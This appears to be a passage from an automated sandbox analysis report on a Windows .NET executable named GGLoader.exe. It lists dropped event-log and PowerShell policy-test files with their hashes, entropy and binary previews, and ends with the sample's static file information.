                                                                                                  Preview:ElfChnk....................................../..(4............................................................................................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.2039489788222188
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:MjW4jrP+MZQNRBEZWTENO4bpBko7S/6FgVt:qNKNVaO80o7S/6Fg
                                                                                                  MD5:A934F4F98D4742F0E6D8A2E4B3CDFB97
                                                                                                  SHA1:E6C6D16883024C9BFC611E72D9B4909042DDB51F
                                                                                                  SHA-256:E43229A598FA23306940E52047729209D3A1CC7CA969BA32BA1584E7C1AF2328
                                                                                                  SHA-512:76340C59B524B7E8737457121AFB8B7B865DFEA6BAF0CB0351228E3CFD25583063DCD1EE018189D6CC7A35BDC1E4B7F0DE2CADAFA9F02A3DC91CD9A581E7BE3C
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk........................................................................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............M.G...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.6469884746870727
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                                                                                  MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                                                                                  SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                                                                                  SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                                                                                  SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):3.404020272954643
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:JPa0NeaqaWayaya6aOaCa2aqamayaia+aeaKaWaCaGaea+a+a2amaeaOaiaWaCaT:RN
                                                                                                  MD5:A1A37B9FDBCA9CC997AF86FEC22E5D70
                                                                                                  SHA1:4FAD3F77FA4AC3EDC7E977D2CDBA244B4DDFABBF
                                                                                                  SHA-256:B37A37298273FAAE3EFE50A6CA3213B495E2715894378238D7A0DC26E2293C95
                                                                                                  SHA-512:5FC6B994D2F2F55113E9E216C59BA1B04DB67503A429C547BFB0A9E7E78E7B33B80522AE083ADACCC5370A4A07897165C1DB0E356335CF33259532AE7331C65B
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........@...............@...............`...%.%.......................................................................m.................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H...........1.)...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.3132453844344478
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                                                                                  MD5:6237EE0458A0478242B975E9BB7AA97D
                                                                                                  SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                                                                                  SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                                                                                  SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.325262033408211
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                                                                                  MD5:D13189B45679E53F5744A4D449F8B00F
                                                                                                  SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                                                                                  SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                                                                                  SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):0.7947046118743749
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                                                                                  MD5:55E73A924B170FBFFF862E8E195E839A
                                                                                                  SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                                                                                  SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                                                                                  SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):70072
                                                                                                  Entropy (8bit):4.364123808339816
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:zGhSR+h/qRn/RqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRd1:aFK8nPLGb/3Fv
                                                                                                  MD5:93EDEA23FE762BAC91ECD808CD994F0E
                                                                                                  SHA1:C86C7F63A89B96286319EEBC9EA7AEFA0A236CFB
                                                                                                  SHA-256:321215F7DDB2E429DF27272C931BE54AD0994EAA436A67D5787786FE5082A208
                                                                                                  SHA-512:23C7BC3541B56BBC35B7A5D169901C07C1D6C62BA967A50F32E833ABAD5C2BE5EEF998A07F563B8ABB347AD56BCC0B9AFE103B54DC2F5DEB36158047FC19C44E
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk..............................................w7.......................................................................4\............................................=...................................................................%...................................................x...f...Z.......l...?.......................................?.......M...F...9...........}...................................Q.......................................................(...&...................................**................p............x68&........x68%..U.l...z..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.273338343434408
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                                                                                  MD5:C37372EB51AEDB4552CB839C7294403A
                                                                                                  SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                                                                                  SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                                                                                  SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):1.231195890775603
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                                                                                  MD5:3365A34953FD7B16667108A049B64DA5
                                                                                                  SHA1:C72421A58E063D64072152344B266F8306A78702
                                                                                                  SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                                                                                  SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.350962660703774
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:6h+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwa:6OqabeGTnbuSx6x
                                                                                                  MD5:C16BA55E2BC1361112DD3C652AC47461
                                                                                                  SHA1:0F54324A386BDCAE8F15E7468E806CAF38F43B3C
                                                                                                  SHA-256:48436A31DED313957F41DB41F0836DE8304EA1949E2543B1F3B4052143988D2C
                                                                                                  SHA-512:DF1B8665FCCD61A8948133FE1917FE6D1F1085D33A36E8E76D520D5E32AEA80703F1404177F3A3D64794E8A0AE61752760B1B053D639DDE656C6F1F0152740E8
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.....................................H...x...n.~t....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):65536
                                                                                                  Entropy (8bit):4.421206160086997
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                                                                                  MD5:67CAD90771EBC0BD20736201D89C1586
                                                                                                  SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                                                                                  SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                                                                                  SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                  C:\Windows\System32\winevt\Logs\Security.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72424
                                                                                                  Entropy (8bit):4.341303148201864
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:0FFR8oIonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1+o/xo+:oca1ZGg6UziBIesJ
                                                                                                  MD5:8F29885E3BD831215B07A0741EA1E49F
                                                                                                  SHA1:7757891A939097A689F9065025C17660B3AF7843
                                                                                                  SHA-256:E6B39D940ED21F048565F4A0B3AC7AFD877C4581F8C94D54532F36DB6FD8F004
                                                                                                  SHA-512:DF78CBB49F0A5D94C63697DD29028930159C921982157D4EFFA1D6ABDDFE6C31FF28412A78967343023E0A238E5E768E4833487F2470FFA73E5D34B5EDCAC1C2
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................U.......U...................<..........................................................................o....................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U........Ik............Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                                                  C:\Windows\System32\winevt\Logs\System.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):66736
                                                                                                  Entropy (8bit):4.413089517062763
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:MH93FR8WHgBCQ19pWKOH9x/leADoND+GnqmYqPeqXIRmR0R5HeJvGAgXZIpURCO5:Md1UC1dPnLmLQXHmtpJnqiNHpzoQp
                                                                                                  MD5:1234DF6628BF6800EBDF20F79382EB9A
                                                                                                  SHA1:782B3D34873220086066A5095E4B42447E3592CC
                                                                                                  SHA-256:ADCB1ED938A0EDB84475C9B93E3D10B91EC8D0DD4B8A6804C1D8A6A708308568
                                                                                                  SHA-512:5AF7AAB5BE0DCC8CFEE043EE6E921614D06C31812920FB590D7F7400E0E4736CBFE77E52101E1A635AE3A2E328FC2433FAD80F5B969D379727575B047017CE01
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.................m.......w.....................t........................................................................................@...s...h...............h...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......w......../a..............................................................................8.............!................@./a....jv.n'(.I..d.K[.........w....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.D.N.S.-.C.l.i.e.n.t.n....~.I...x.=.MS.y.s.t.e.m....................@.\...o...................@....A..)...h........=.......Q.u.e.r.y.N.a.m.e.......A..1...h...#....=.......A.d.d.r.e.s.s.L.e.n.g.t.h.......A..%...h........=.......A.d.d.r.e.s.s.............@...........f.e.3

                                                                                                  C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):127064
                                                                                                  Entropy (8bit):3.709372309544318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:4K7tyK7tKK7t11d1MK7tfK7tyK7tKK7t11d1MK7tsd1:4K7tyK7tKK7t11d1MK7tfK7tyK7tKK7q
                                                                                                  MD5:C1A07EEF64EC871BC17E32FAE1FDC68E
                                                                                                  SHA1:C2C06944B5148EDD3E12E2A21F75BC9006E8EE37
                                                                                                  SHA-256:2B3FF96FB9FAF3E5FB8725E472FE35B87F126B6A5385B920D6E57FF42085C5A7
                                                                                                  SHA-512:5FC876EFCB8AD2F7703824E37E88C10971114E368116C07C7CE7E594FAE5F5E5D864ABF097DD7B906527D11CC9EA2F397DFDFCE6E1784FF4121A8B5024231FE4
                                                                                                  Malicious:false
                                                                                                  Preview:ElfChnk.-.......1...........................p...X......R.......................................................................k............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**...3..........U.t...........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_4cqqcliu.q0w.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_cq10dmzw.khu.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_gckjyekc.li0.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_huebh1qz.fuu.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):4.221217187761465
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  File name:GGLoader.exe
                                                                                                  File size:19'456 bytes
                                                                                                  MD5:982e4ae4559538cfb529dfaff0507880
                                                                                                  SHA1:a3b0e3989d6e40792134286e40448004ebeda077
                                                                                                  SHA256:95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
